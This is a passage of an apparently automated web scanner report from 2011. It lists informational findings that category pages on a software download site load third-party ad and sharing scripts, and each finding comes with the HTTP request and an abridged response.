<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1405. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1406. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-business-downloads-2-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85656


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1407. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1408. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66926


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1409. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-communications-downloads-3-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:39 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1410. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79258


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1411. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1412. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1413. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52725


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1414. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76989


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1415. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1416. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1417. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81531


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1418. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:05 GMT
Cache-Control: max-age=600
Pragma: cache
